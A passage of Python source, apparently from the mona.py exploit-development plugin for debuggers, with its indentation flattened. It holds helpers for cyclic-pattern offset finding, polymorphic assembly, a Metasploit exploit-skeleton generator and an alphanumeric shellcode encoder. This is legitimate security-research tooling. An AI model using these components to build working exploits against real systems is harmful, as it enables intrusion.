jsondict = json.loads(jsondata)
return jsondict
def writeJSONDict(filename, dicttosave):
"""
Write dict as JSON to file
"""
with open(filename, 'wb') as outfile:
json.dump(dicttosave, outfile)
return
def readPickleDict(filename):
"""
Retrieve stored dict from file (pickle load)
"""
pdict = {}
pdict = pickle.load( open(filename,"rb"))
return pdict
def writePickleDict(filename, dicttosave):
"""
Write a dict to file as a pickle
"""
pickle.dump(dicttosave, open(filename, "wb"))
return
def opcodesToHex(opcodes):
"""
Converts pairs of chars (opcode bytes) to hex string notation
Arguments :
opcodes : pairs of chars
Return :
string with hex
"""
toreturn = []
opcodes = opcodes.replace(" ","")
for cnt in range(0, len(opcodes), 2):
thisbyte = opcodes[cnt:cnt+2]
toreturn.append("\\x" + thisbyte)
toreturn = ''.join(toreturn)
return toreturn
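# Illustrative example (spaces in the opcode string are ignored):
#   >>> opcodesToHex("90 90 cc")
#   '\\x90\\x90\\xcc'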
def rmLeading(input,toremove,toignore=""):
"""
Removes leading characters from an input string
Arguments:
input - the input string
toremove - the character to remove from the beginning of the string
toignore - ignore this character
Return:
the input string without the leading character(s)
"""
newstring = ""
cnt = 0
while cnt < len(input):
if input[cnt] != toremove and input[cnt] != toignore:
break
cnt += 1
newstring = input[cnt:]
return newstring
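# Illustrative example (leading zeroes stripped, the rest is untouched):
#   >>> rmLeading("000041424344", "0")
#   '41424344'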
def getVersionInfo(filename):
"""Retrieves version and revision numbers from a mona file
Arguments : filename
Return :
version - string with version (or empty if not found)
revision - string with revision (or empty if not found)
"""
file = open(filename,"rb")
content = file.readlines()
file.close()
revision = ""
version = ""
for line in content:
if line.startswith("$Revision"):
parts = line.split(" ")
if len(parts) > 1:
revision = parts[1].replace("$","")
if line.startswith("__VERSION__"):
parts = line.split("=")
if len(parts) > 1:
version = parts[1].strip()
return version,revision
def toniceHex(data,size):
"""
Converts a series of bytes into a hex string,
newline after 'size' nr of bytes
Arguments :
data - the bytes to convert
size - the number of bytes to show per line
Return :
a multiline string
"""
flip = 1
thisline = "\""
block = ""
for cnt in xrange(len(data)):
thisline += "\\x%s" % toHexByte(ord(data[cnt]))
if (flip == size) or (cnt == len(data)-1):
thisline += "\""
flip = 0
block += thisline
block += "\n"
thisline = "\""
cnt += 1
flip += 1
return block.lower()
def hexStrToInt(inputstr):
"""
Converts a string with hex bytes to a numeric value
Arguments:
inputstr - A string representing the bytes to convert. Example : 41414141
Return:
the numeric value
"""
valtoreturn = 0
try:
valtoreturn = int(inputstr, 16)
except:
valtoreturn = 0
return valtoreturn
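# Illustrative example (invalid input falls back to 0):
#   >>> hexStrToInt("41414141")
#   1094795585
#   >>> hexStrToInt("zzz")
#   0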
def to_int(inputstr):
"""
Converts a string to int, whether it's hex or decimal
Arguments:
inputstr - A string representation of a number. Example: 0xFFFF, 2345
Return:
the numeric value
"""
if str(inputstr).lower().startswith("0x"):
return hexStrToInt(inputstr)
else:
return int(inputstr)
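# Illustrative example (hex strings need the 0x prefix, everything else is treated as decimal):
#   >>> to_int("0x100")
#   256
#   >>> to_int("2345")
#   2345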
def toSize(toPad,size):
"""
Adds spaces to a string until the string reaches a certain length
Arguments:
toPad - the string to pad
size - the destination size of the string
Return:
the expanded string of length <size>
"""
padded = toPad + " " * (size - len(toPad))
return padded.ljust(size," ")
def toUnicode(input):
"""
Converts a series of bytes to unicode (UTF-16) bytes
Arguments :
input - the source bytes
Return:
the unicode expanded version of the input
"""
unicodebytes = ""
# try/except, just in case .encode bails out
try:
unicodebytes = input.encode('UTF-16LE')
except:
inputlst = list(input)
for inputchar in inputlst:
unicodebytes += inputchar + '\x00'
return unicodebytes
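# Illustrative example (each input byte is followed by a null byte, UTF-16LE style):
#   >>> toUnicode("AB")
#   'A\x00B\x00'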
def toJavaScript(input):
"""
Extracts pointers from lines of text
and returns a javascript friendly version
"""
alllines = input.split("\n")
javascriptversion = ""
allbytes = ""
for eachline in alllines:
thisline = eachline.replace("\t","").lower().strip()
if not(thisline.startswith("#")):
if thisline.startswith("0x"):
theptr = thisline.split(",")[0].replace("0x","")
# change order to unescape format
if arch == 32:
ptrstr = ""
byte1 = theptr[0] + theptr[1]
ptrstr = "\\x" + byte1
byte2 = theptr[2] + theptr[3]
ptrstr = "\\x" + byte2 + ptrstr
try:
byte3 = theptr[4] + theptr[5]
ptrstr = "\\x" + byte3 + ptrstr
except:
pass
try:
byte4 = theptr[6] + theptr[7]
ptrstr = "\\x" + byte4 + ptrstr
except:
pass
allbytes += hex2bin(ptrstr)
if arch == 64:
byte1 = theptr[0] + theptr[1]
byte2 = theptr[2] + theptr[3]
byte3 = theptr[4] + theptr[5]
byte4 = theptr[6] + theptr[7]
byte5 = theptr[8] + theptr[9]
byte6 = theptr[10] + theptr[11]
byte7 = theptr[12] + theptr[13]
byte8 = theptr[14] + theptr[15]
allbytes += hex2bin("\\x" + byte8 + "\\x" + byte7 + "\\x" + byte6 + "\\x" + byte5)
allbytes += hex2bin("\\x" + byte4 + "\\x" + byte3 + "\\x" + byte2 + "\\x" + byte1)
javascriptversion = str2js(allbytes)
return javascriptversion
def getSourceDest(instruction):
"""
Determines source and destination register for a given instruction
"""
src = []
dst = []
srcp = []
dstp = []
srco = []
dsto = []
instr = []
haveboth = False
seensep = False
seeninstr = False
regs = getAllRegs()
instructionparts = multiSplit(instruction,[" ",","])
if "," in instructionparts:
haveboth = True
delkeys = ["DWORD","PTR","BYTE"]
for d in delkeys:
if d in instructionparts:
instructionparts.remove(d)
for p in instructionparts:
regfound = False
for r in regs:
if r.upper() in p.upper() and not "!" in p and not len(instr) == 0:
regfound = True
seeninstr = True
break
if not regfound:
if not seeninstr and not seensep:
instr.append(p)
if "," in p:
seensep = True
else:
for r in regs:
if r.upper() in p.upper():
if not seensep or not haveboth:
dstp.append(p)
if not r in dsto:
dsto.append(r)
break
else:
srcp.append(p)
if not r in srco:
srco.append(r)
break
#dbg.log("dst: %s" % dsto)
#dbg.log("src: %s" % srco)
src = srcp
dst = dstp
return src,dst
def getAllRegs():
"""
Return an array with all 32bit, 16bit and 8bit registers
"""
regs = ["EAX","EBX","ECX","EDX","ESP","EBP","ESI","EDI","EIP"]
regs.append("AX")
regs.append("BX")
regs.append("CX")
regs.append("DX")
regs.append("BP")
regs.append("SP")
regs.append("SI")
regs.append("DI")
regs.append("AL")
regs.append("AH")
regs.append("BL")
regs.append("BH")
regs.append("CL")
regs.append("CH")
regs.append("DL")
regs.append("DH")
return regs
def getSmallerRegs(reg):
if reg == "EAX":
return ["AX","AL","AH"]
if reg == "AX":
return ["AL","AH"]
if reg == "EBX":
return ["BX","BL","BH"]
if reg == "BX":
return ["BL","BH"]
if reg == "ECX":
return ["CX","CL","CH"]
if reg == "CX":
return ["CL","CH"]
if reg == "EDX":
return ["DX","DL","DH"]
if reg == "DX":
return ["DL","DH"]
if reg == "ESP":
return ["SP"]
if reg == "EBP":
return ["BP"]
if reg == "ESI":
return ["SI"]
if reg == "EDI":
return ["DI"]
return []
def isReg(reg):
"""
Checks if a given string is a valid reg
Argument :
reg - the register to check
Return:
Boolean
"""
regs = []
if arch == 32:
regs=["eax","ebx","ecx","edx","esi","edi","ebp","esp"]
if arch == 64:
regs=["rax","rbx","rcx","rdx","rsi","rdi","rbp","rsp", "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]
return str(reg).lower() in regs
def isAddress(string):
"""
Check if a string is an address / consists of hex chars only
Arguments:
string - the string to check
Return:
Boolean - True if the address string only contains hex bytes
"""
string = string.replace("\\x","")
if len(string) > 16:
return False
for char in string:
if char.upper() not in ["A","B","C","D","E","F","1","2","3","4","5","6","7","8","9","0"]:
return False
return True
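# Illustrative example (only hex characters are accepted, max 16 of them):
#   >>> isAddress("41414141")
#   True
#   >>> isAddress("41zz4141")
#   False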
def isHexValue(string):
"""
Check if a string is a hex value / consists of hex chars only (and - )
Arguments:
string - the string to check
Return:
Boolean - True if the address string only contains hex bytes or - sign
"""
string = string.replace("\\x","")
string = string.replace("0x","")
if len(string) > 16:
return False
for char in string:
if char.upper() not in ["A","B","C","D","E","F","1","2","3","4","5","6","7","8","9","0","-"]:
return False
return True
def Poly_ReturnDW(value):
I = random.randint(1, 3)
if I == 1:
if random.randint(1, 2) == 1:
return dbg.assemble( "SUB EAX, EAX\n ADD EAX, 0x%08x" % value )
else:
return dbg.assemble( "SUB EAX, EAX\n ADD EAX, -0x%08x" % value )
if I == 2:
return dbg.assemble( "PUSH 0x%08x\n POP EAX\n" % value )
if I == 3:
if random.randint(1, 2) == 1:
return dbg.assemble( "XCHG EAX, EDI\n DB 0xBF\n DD 0x%08x\n XCHG EAX, EDI" % value )
else:
return dbg.assemble( "XCHG EAX, EDI\n MOV EDI, 0x%08x\n XCHG EAX, EDI" % value )
return
def Poly_Return0():
I = random.randint(1, 4)
if I == 1:
return dbg.assemble( "SUB EAX, EAX" )
if I == 2:
if random.randint(1, 2) == 1:
return dbg.assemble( "PUSH 0\n POP EAX" )
else:
return dbg.assemble( "DB 0x6A, 0x00\n POP EAX" )
if I == 3:
return dbg.assemble( "XCHG EAX, EDI\n SUB EDI, EDI\n XCHG EAX, EDI" )
if I == 4:
return Poly_ReturnDW(0)
return
def addrToInt(string):
"""
Convert a textual address to an integer
Arguments:
string - the address
Return:
int - the address value
"""
string = string.replace("\\x","")
return hexStrToInt(string)
def splitAddress(address):
"""
Splits a dword/qword into individual bytes (4 or 8 bytes)
Arguments:
address - the address (integer value) to split
Return:
4 or 8 bytes
"""
if arch == 32:
byte1 = address >> 24 & 0xFF
byte2 = address >> 16 & 0xFF
byte3 = address >> 8 & 0xFF
byte4 = address & 0xFF
return byte1,byte2,byte3,byte4
if arch == 64:
byte1 = address >> 56 & 0xFF
byte2 = address >> 48 & 0xFF
byte3 = address >> 40 & 0xFF
byte4 = address >> 32 & 0xFF
byte5 = address >> 24 & 0xFF
byte6 = address >> 16 & 0xFF
byte7 = address >> 8 & 0xFF
byte8 = address & 0xFF
return byte1,byte2,byte3,byte4,byte5,byte6,byte7,byte8
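# Illustrative example (assumes the global 'arch' is 32; bytes are returned most significant first):
#   >>> splitAddress(0x41424344)
#   (65, 66, 67, 68)    # i.e. 0x41, 0x42, 0x43, 0x44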
def bytesInRange(address, range):
"""
Checks if all bytes of an address are in a range
Arguments:
address - the address to check
range - a range object containing the values all bytes need to comply with
Return:
a boolean
"""
if arch == 32:
byte1,byte2,byte3,byte4 = splitAddress(address)
# if the first is a null we keep the address anyway
if not (byte1 == 0 or byte1 in range):
return False
elif not byte2 in range:
return False
elif not byte3 in range:
return False
elif not byte4 in range:
return False
if arch == 64:
byte1,byte2,byte3,byte4,byte5,byte6,byte7,byte8 = splitAddress(address)
# if the first is a null we keep the address anyway
if not (byte1 == 0 or byte1 in range):
return False
elif not byte2 in range:
return False
elif not byte3 in range:
return False
elif not byte4 in range:
return False
elif not byte5 in range:
return False
elif not byte6 in range:
return False
elif not byte7 in range:
return False
elif not byte8 in range:
return False
return True
def readString(address):
"""
Reads a string from the given address until it reaches a null byte
Arguments:
address - the base address (integer value)
Return:
the string
"""
toreturn = dbg.readString(address)
return toreturn
def getSegmentEnd(segmentstart):
os = dbg.getOsVersion()
offset = 0x24
if win7mode:
offset = 0x28
segmentend = struct.unpack('<L',dbg.readMemory(segmentstart + offset,4))[0]
return segmentend
def getHeapFlag(flag):
flags = {
0x0 : "Free",
0x1 : "Busy",
0x2 : "Extra present",
0x4 : "Fill pattern",
0x8 : "Virtallocd",
0x10 : "Last",
0x20 : "FFU-1",
0x40 : "FFU-2",
0x80 : "No Coalesce"
}
#if win7mode:
# flags[0x8] = "Internal"
if flag in flags:
return flags[flag]
else:
# maybe it's a combination of flags
values = [0x80, 0x40, 0x20, 0x10, 0x8, 0x4, 0x2, 0x1]
flagtext = []
for val in values:
if (flag - val) >= 0:
flagtext.append(flags[val])
flag -= val
if len(flagtext) == 0:
flagtext = "Unknown"
else:
flagtext = ','.join(flagtext)
return flagtext
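# Illustrative example (single flags are looked up directly, combinations are decomposed):
#   >>> getHeapFlag(0x1)
#   'Busy'
#   >>> getHeapFlag(0x5)
#   'Fill pattern,Busy'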
def decodeHeapHeader(headeraddress,headersize,key):
# get header and decode first 4 bytes
blockcnt = 0
fullheaderbytes = ""
decodedheader = ""
fullheaderbytes = ""
while blockcnt < headersize:
header = struct.unpack('<L',dbg.readMemory(headeraddress+blockcnt,4))[0]
if blockcnt == 0:
decodedheader = header ^ key
else:
decodedheader = header
headerbytes = "%08x" % decodedheader
bytecnt = 7
while bytecnt >= 0:
fullheaderbytes = fullheaderbytes + headerbytes[bytecnt-1] + headerbytes[bytecnt]
bytecnt -= 2
blockcnt += 4
return hex2bin(fullheaderbytes)
def walkSegment(FirstEntry,LastValidEntry,heapbase):
"""
Finds all chunks in a given segment
Arguments : Start and End of segment, and heapbase
Returns a dictionary of MnChunk objects
Key : chunk pointer
"""
mHeap = MnHeap(heapbase)
mSegment = MnSegment(heapbase,FirstEntry,LastValidEntry)
return mSegment.getChunks()
def getStacks():
"""
Retrieves all stacks from all threads in the current application
Arguments:
None
Return:
a dictionary, with key = threadID. Each entry contains an array with base and top of the stack
"""
stacks = {}
global stacklistCache
if len(stacklistCache) > 0:
return stacklistCache
else:
threads = dbg.getAllThreads()
for thread in threads:
teb = thread.getTEB()
tid = thread.getId()
topStack = 0
baseStack = 0
if arch == 32:
topStack = struct.unpack('<L',dbg.readMemory(teb+4,4))[0]
baseStack = struct.unpack('<L',dbg.readMemory(teb+8,4))[0]
if arch == 64:
topStack = struct.unpack('<Q',dbg.readMemory(teb+8,8))[0]
baseStack = struct.unpack('<Q',dbg.readMemory(teb+16,8))[0]
stacks[tid] = [baseStack,topStack]
stacklistCache = stacks
return stacks
def meetsAccessLevel(page,accessLevel):
"""
Checks if a given page meets a given access level
Arguments:
page - a page object
accesslevel - a string containing one of the following access levels :
R,W,X,RW,RX,WR,WX,RWX or *
Return:
a boolean
"""
if "*" in accessLevel:
return True
pageAccess = page.getAccess(human=True)
if "-R" in accessLevel:
if "READ" in pageAccess:
return False
if "-W" in accessLevel:
if "WRITE" in pageAccess:
return False
if "-X" in accessLevel:
if "EXECUTE" in pageAccess:
return False
if "R" in accessLevel:
if not "READ" in pageAccess:
return False
if "W" in accessLevel:
if not "WRITE" in pageAccess:
return False
if "X" in accessLevel:
if not "EXECUTE" in pageAccess:
return False
return True
def splitToPtrInstr(input):
"""
Splits a line (retrieved from a mona output file) into a pointer and a string with the instructions in the file
Arguments:
input : the line containing pointer and instruction
Return:
a pointer - (integer value)
a string - instruction
if the input does not contain a valid line, pointer will be set to -1 and string will be empty
"""
thispointer = -1
thisinstruction = ""
split1 = re.compile(" ")
split2 = re.compile(":")
split3 = re.compile("\*\*")
thisline = input.lower()
if thisline.startswith("0x"):
#get the pointer
parts = split1.split(input)
part1 = parts[0].replace("\n","").replace("\r","")
if len(part1) != 10:
return thispointer,thisinstruction
else:
thispointer = hexStrToInt(part1)
if len(parts) > 1:
subparts = split2.split(input)
subpartsall = ""
if len(subparts) > 1:
cnt = 1
while cnt < len(subparts):
subpartsall += subparts[cnt] + ":"
cnt +=1
subsubparts = split3.split(subpartsall)
thisinstruction = subsubparts[0].strip()
return thispointer,thisinstruction
else:
return thispointer,thisinstruction
def getNrOfDictElements(thisdict):
"""
Will get the total number of entries in a given dictionary
Argument: the source dictionary
Output : an integer
"""
total = 0
for dicttype in thisdict:
for dictval in thisdict[dicttype]:
total += 1
return total
def getModuleObj(modname):
"""
Will return a module object if the provided module name exists
Will perform a case sensitive search first,
and then a case insensitive search in case nothing was found
"""
# Method 1
mod = dbg.getModule(modname)
if mod is not None:
return MnModule(modname)
# Method 2
suffixes = ["",".exe",".dll"]
allmod = dbg.getAllModules()
for suf in suffixes:
modname_search = modname + suf
#WinDBG optimized
if __DEBUGGERAPP__ == "WinDBG":
for tmod_s in allmod:
tmod = dbg.getModule(tmod_s)
if not tmod == None:
if tmod.getName() == modname_search:
return MnModule(tmod_s)
imname = dbg.getImageNameForModule(tmod.getName())
if not imname == None:
if imname == modname_search:
return MnModule(tmod)
for tmod_s in allmod:
tmod = dbg.getModule(tmod_s)
if not tmod == None:
if tmod.getName().lower() == modname_search.lower():
return MnModule(tmod_s)
imname = dbg.getImageNameForModule(tmod.getName().lower())
if not imname == None:
if imname.lower() == modname_search.lower():
return MnModule(tmod)
for tmod_s in allmod:
tmod = dbg.getModule(tmod_s)
if not tmod == None:
if tmod_s.lower() == modname_search.lower():
return MnModule(tmod_s)
else:
# Immunity
for tmod_s in allmod:
if not tmod_s == None:
mname = tmod_s.getName()
if mname == modname_search:
return MnModule(mname)
for tmod_s in allmod:
if not tmod_s == None:
mname = tmod_s.getName()
if mname.lower() == modname_search.lower():
return MnModule(mname)
return None
def getPatternLength(startptr,type="normal",args={}):
"""
Gets length of a cyclic pattern, starting from a given pointer
Arguments:
startptr - the start pointer (integer value)
type - optional string, indicating type of pattern :
"normal" : normal pattern
"unicode" : unicode pattern
"upper" : uppercase pattern
"lower" : lowercase pattern
"""
patternsize = 0
endofpattern = False
global silent
oldsilent=silent
silent=True
fullpattern = createPattern(200000,args)
silent=oldsilent
if type == "upper":
fullpattern = fullpattern.upper()
if type == "lower":
fullpattern = fullpattern.lower()
#if type == "unicode":
# fullpattern = toUnicode(fullpattern)
if type in ["normal","upper","lower","unicode"]:
previousloc = -1
while not endofpattern and patternsize <= len(fullpattern):
sizemeter=dbg.readMemory(startptr+patternsize,4)
if type == "unicode":
sizemeter=dbg.readMemory(startptr+patternsize,8)
sizemeter = sizemeter.replace('\x00','')
else:
sizemeter=dbg.readMemory(startptr+patternsize,4)
if len(sizemeter) == 4:
thisloc = fullpattern.find(sizemeter)
if thisloc < 0 or thisloc <= previousloc:
endofpattern = True
else:
patternsize += 4
previousloc = thisloc
else:
return patternsize
#maybe this is not the end yet
patternsize -= 8
endofpattern = False
while not endofpattern and patternsize <= len(fullpattern):
sizemeter=dbg.readMemory(startptr+patternsize,4)
if type == "unicode":
sizemeter=dbg.readMemory(startptr+patternsize,8)
sizemeter = sizemeter.replace('\x00','')
else:
sizemeter=dbg.readMemory(startptr+patternsize,4)
if fullpattern.find(sizemeter) < 0:
patternsize += 3
endofpattern = True
else:
patternsize += 1
if type == "unicode":
patternsize = (patternsize / 2) + 1
return patternsize
def getAPointer(modules,criteria,accesslevel):
"""
Gets the first pointer from one of the supplied modules that meets a set of criteria
Arguments:
modules - array with module names
criteria - dictionary describing the criteria the pointer needs to comply with
accesslevel - the required access level
Return:
a pointer (integer value) or 0 if nothing was found
"""
pointer = 0
dbg.getMemoryPages()
for a in dbg.MemoryPages.keys():
page_start = a
page_size = dbg.MemoryPages[a].getSize()
page_end = a + page_size
#page in one of the modules ?
if meetsAccessLevel(dbg.MemoryPages[a],accesslevel):
pageptr = MnPointer(a)
thismodulename = pageptr.belongsTo()
if thismodulename != "" and thismodulename in modules:
thismod = MnModule(thismodulename)
start = thismod.moduleBase
end = thismod.moduleTop
random.seed()
for cnt in xrange(page_size+1):
#randomize the value
theoffset = random.randint(0,page_size)
thispointer = MnPointer(page_start + theoffset)
if meetsCriteria(thispointer,criteria):
return page_start + theoffset
return pointer
def haveRepetition(string, pos):
first = string[pos]
MIN_REPETITION = 3
if len(string) - pos > MIN_REPETITION:
count = 1
while ( count < MIN_REPETITION and string[pos+count] == first):
count += 1
if count >= MIN_REPETITION:
return True
return False
def findAllPaths(graph,start_vertex,end_vertex,path=[]):
path = path + [start_vertex]
if start_vertex == end_vertex:
return [path]
if start_vertex not in graph:
return []
paths = []
for vertex in graph[start_vertex]:
if vertex not in path:
extended_paths = findAllPaths(graph,vertex,end_vertex,path)
for p in extended_paths:
paths.append(p)
return paths
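# Illustrative example with a hypothetical adjacency-list graph (plain dict, no debugger state needed):
#   >>> g = {'a': ['b', 'c'], 'b': ['c'], 'c': []}
#   >>> findAllPaths(g, 'a', 'c')
#   [['a', 'b', 'c'], ['a', 'c']]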
def isAsciiString(data):
"""
Check if a given string only contains ascii characters
"""
return all((ord(c) >= 32 and ord(c) <= 127) for c in data)
def isAscii(b):
"""
Check if a given hex byte is ascii or not
Argument : the byte
Returns : Boolean
"""
return b == 0x0a or b == 0x0d or (b >= 0x20 and b <= 0x7e)
def isAscii2(b):
"""
Check if a given hex byte is ascii or not, will not flag newline or carriage return as ascii
Argument : the byte
Returns : Boolean
"""
return b >= 0x20 and b <= 0x7e
def isHexString(input):
"""
Checks if all characters in a string are hex (0->9, a->f, A->F)
Alias for isAddress()
"""
return isAddress(input)
def extract_chunks(iterable, size):
""" Retrieves chunks of the given :size from the :iterable """
fill = object()
gen = itertools.izip_longest(fillvalue=fill, *([iter(iterable)] * size))
return (tuple(x for x in chunk if x != fill) for chunk in gen)
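# Illustrative example (Python 2, relies on itertools.izip_longest; the last chunk may be shorter):
#   >>> list(extract_chunks("ABCDE", 2))
#   [('A', 'B'), ('C', 'D'), ('E',)]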
def rrange(x, y = 0):
""" Creates a reversed range (from x - 1 down to y).
Example:
>>> rrange(10, 0) # => [9, 8, 7, 6, 5, 4, 3, 2, 1, 0]
"""
return range(x - 1, y - 1, -1)
def getSkeletonHeader(exploittype,portnr,extension,url,badchars='\x00\x0a\x0d'):
originalauthor = "insert_name_of_person_who_discovered_the_vulnerability"
name = "insert name for the exploit"
cve = "insert CVE number here"
if url == "":
url = "<insert another link to the exploit/advisory here>"
else:
try:
# connect to url & get author + app description
u = urllib.urlretrieve(url)
# extract title
fh = open(u[0],'r')
contents = fh.readlines()
fh.close()
for line in contents:
if line.find('<h1') > -1:
titleline = line.split('>')
if len(titleline) > 1:
name = titleline[1].split('<')[0].replace("\"","").replace("'","").strip()
break
for line in contents:
if line.find('Author:') > -1 and line.find('td style') > -1:
authorline = line.split("Author:")
if len(authorline) > 1:
originalauthor = authorline[1].split('<')[0].replace("\"","").replace("'","").strip()
break
for line in contents:
if line.find('CVE:') > -1 and line.find('td style') > -1:
cveline = line.split("CVE:")
if len(cveline) > 1:
tcveparts = cveline[1].split('>')
if len(tcveparts) > 1:
tcve = tcveparts[1].split('<')[0].replace("\"","").replace("'","").strip()
if tcve.upper().strip() != "N//A":
cve = tcve
break
except:
dbg.log(" ** Unable to download %s" % url,highlight=1)
url = "<insert another link to the exploit/advisory here>"
monaConfig = MnConfig()
thisauthor = monaConfig.get("author")
if thisauthor == "":
thisauthor = "<insert your name here>"
skeletonheader = "##\n"
skeletonheader += "# This module requires Metasploit: http://metasploit.com/download\n"
skeletonheader += "# Current source: https://github.com/rapid7/metasploit-framework\n"
skeletonheader += "##\n\n"
skeletonheader += "require 'msf/core'\n\n"
skeletonheader += "class MetasploitModule < Msf::Exploit::Remote\n"
skeletonheader += " #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking\n"
skeletonheader += " #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking\n"
skeletonheader += " Rank = NormalRanking\n\n"
if exploittype == "fileformat":
skeletonheader += " include Msf::Exploit::FILEFORMAT\n"
if exploittype == "network client (tcp)":
skeletonheader += " include Msf::Exploit::Remote::Tcp\n"
if exploittype == "network client (udp)":
skeletonheader += " include Msf::Exploit::Remote::Udp\n"
if cve.strip() == "":
cve = "<insert CVE number here>"
skeletoninit = " def initialize(info = {})\n"
skeletoninit += " super(update_info(info,\n"
skeletoninit += " 'Name' => '" + name + "',\n"
skeletoninit += " 'Description' => %q{\n"
skeletoninit += " Provide information about the vulnerability / explain as good as you can\n"
skeletoninit += " Make sure to keep each line less than 100 columns wide\n"
skeletoninit += " },\n"
skeletoninit += " 'License' => MSF_LICENSE,\n"
skeletoninit += " 'Author' =>\n"
skeletoninit += " [\n"
skeletoninit += " '" + originalauthor + "<user[at]domain.com>', # Original discovery\n"
skeletoninit += " '" + thisauthor + "', # MSF Module\n"
skeletoninit += " ],\n"
skeletoninit += " 'References' =>\n"
skeletoninit += " [\n"
skeletoninit += " [ 'OSVDB', '<insert OSVDB number here>' ],\n"
skeletoninit += " [ 'CVE', '" + cve + "' ],\n"
skeletoninit += " [ 'URL', '" + url + "' ]\n"
skeletoninit += " ],\n"
skeletoninit += " 'DefaultOptions' =>\n"
skeletoninit += " {\n"
skeletoninit += " 'ExitFunction' => 'process', #none/process/thread/seh\n"
skeletoninit += " #'InitialAutoRunScript' => 'migrate -f',\n"
skeletoninit += " },\n"
skeletoninit += " 'Platform' => 'win',\n"
skeletoninit += " 'Payload' =>\n"
skeletoninit += " {\n"
skeletoninit += " 'BadChars' => \"" + bin2hexstr(badchars) + "\", # <change if needed>\n"
skeletoninit += " 'DisableNops' => true,\n"
skeletoninit += " },\n"
skeletoninit2 = " 'Privileged' => false,\n"
skeletoninit2 += " #Correct Date Format: \"M D Y\"\n"
skeletoninit2 += " #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec\n"
skeletoninit2 += " 'DisclosureDate' => 'MONTH DAY YEAR',\n"
skeletoninit2 += " 'DefaultTarget' => 0))\n"
if exploittype.find("network") > -1:
skeletoninit2 += "\n register_options([Opt::RPORT(" + str(portnr) + ")], self.class)\n"
if exploittype.find("fileformat") > -1:
skeletoninit2 += "\n register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf" + extension + "']),], self.class)\n"
skeletoninit2 += "\n end\n\n"
return skeletonheader,skeletoninit,skeletoninit2
def archValue(x86, x64):
if arch == 32:
return x86
elif arch == 64:
return x64
def readPtrSizeBytes(ptr):
if arch == 32:
return struct.unpack('<L',dbg.readMemory(ptr,4))[0]
elif arch == 64:
return struct.unpack('<Q',dbg.readMemory(ptr,8))[0]
def getOsOffset(name):
osrelease = dbg.getOsRelease()
osreleaseparts = osrelease.split(".")
major = int(osreleaseparts[0])
minor = int(osreleaseparts[1])
build = int(osreleaseparts[2])
offset_category = "xp"
if major == 6 and minor == 0:
offset_category = "vista"
elif major == 6 and minor == 1:
offset_category = "win7"
elif major == 6 and minor in [2, 3]:
offset_category = "win8"
elif major == 10 and minor == 0:
offset_category = "win10"
offset_category_index = offset_categories.index(offset_category)
offset = 0
curr_category = "xp"
for c in offset_categories:
if not c in offsets[name]:
continue
if offset_categories.index(c) > offset_category_index:
break
curr_category = c
if curr_category != "win10":
offset = offsets[name][c]
else:
win10offsets = offsets[name][c]
for o in sorted(win10offsets):
if o > build:
break
curr_build = o
offset = win10offsets[o]
return archValue(offset[0], offset[1])
#---------------------------------------#
# Class to call commands & parse args #
#---------------------------------------#
class MnCommand:
"""
Class to call commands, show usage and parse arguments
"""
def __init__(self, name, description, usage, parseProc, alias=""):
self.name = name
self.description = description
self.usage = usage
self.parseProc = parseProc
self.alias = alias
#---------------------------------------#
# Class to encode bytes #
#---------------------------------------#
class MnEncoder:
"""
Class to encode bytes
"""
def __init__(self,bytestoencode):
self.origbytestoencode = bytestoencode
self.bytestoencode = bytestoencode
def encodeAlphaNum(self,badchars = []):
encodedbytes = {}
if not silent:
dbg.log("[+] Using alphanum encoder")
dbg.log("[+] Received %d bytes to encode" % len(self.origbytestoencode))
dbg.log("[+] Nr of bad chars: %d" % len(badchars))
# first, check if there are no bad char conflicts
nobadchars = "\x25\x2a\x2d\x31\x32\x35\x4a\x4d\x4e\x50\x55"
badbadchars = False
for b in badchars:
if b in nobadchars:
dbg.log("*** Error: byte \\x%s cannot be a bad char with this encoder" % bin2hex(b))
badbadchars = True
if badbadchars:
return {}
# if all is well, explode the input to a multiple of 4
while True:
moduloresult = len(self.bytestoencode) % 4
if moduloresult == 0:
break
else:
self.bytestoencode += '\x90'
if not len(self.bytestoencode) == len(self.origbytestoencode):
if not silent:
dbg.log("[+] Added %d nops to make length of input a multiple of 4" % (len(self.bytestoencode) - len(self.origbytestoencode)))
# break it down into chunks of 4 bytes
toencodearray = []
toencodearray = [self.bytestoencode[max(i-4,0):i] for i in range(len(self.bytestoencode), 0, -4)][::-1]
blockcnt = 1
encodedline = 0
# we have to push the blocks in reverse order
blockcnt = len(toencodearray)
nrblocks = len(toencodearray)
while blockcnt > 0:
if not silent:
dbg.log("[+] Processing block %d/%d" % (blockcnt,nrblocks))
encodedbytes[encodedline] = ["\x25\x4a\x4d\x4e\x55","AND EAX,0x554E4D4A"]
encodedline += 1
encodedbytes[encodedline] = ["\x25\x35\x32\x31\x2A","AND EAX,0x2A313235"]
encodedline += 1
opcodes=[]
startpos=7
source = "".join(bin2hex(a) for a in toencodearray[blockcnt-1])
origbytes=source[startpos-7]+source[startpos-6]+source[startpos-5]+source[startpos-4]+source[startpos-3]+source[startpos-2]+source[startpos-1]+source[startpos]
reversebytes=origbytes[6]+origbytes[7]+origbytes[4]+origbytes[5]+origbytes[2]+origbytes[3]+origbytes[0]+origbytes[1]
revval=hexStrToInt(reversebytes)
twoval=4294967296-revval
twobytes=toHex(twoval)
if not silent:
dbg.log("Opcode to produce : %s%s %s%s %s%s %s%s" % (origbytes[0],origbytes[1],origbytes[2],origbytes[3],origbytes[4],origbytes[5],origbytes[6],origbytes[7]))
dbg.log(" reversed : %s%s %s%s %s%s %s%s" % (reversebytes[0],reversebytes[1],reversebytes[2],reversebytes[3],reversebytes[4],reversebytes[5],reversebytes[6],reversebytes[7]))
dbg.log(" -----------")
dbg.log(" 2's complement : %s%s %s%s %s%s %s%s" % (twobytes[0],twobytes[1],twobytes[2],twobytes[3],twobytes[4],twobytes[5],twobytes[6],twobytes[7]))
#for each byte, start with last one first
bcnt=3
overflow=0
while bcnt >= 0:
currbyte=twobytes[(bcnt*2)]+twobytes[(bcnt*2)+1]
currval=hexStrToInt(currbyte)-overflow
testval=currval/3
if testval < 32:
#put 1 in front of byte
currbyte="1"+currbyte
currval=hexStrToInt(currbyte)-overflow
overflow=1
else:
overflow=0
val1=currval/3
val2=currval/3
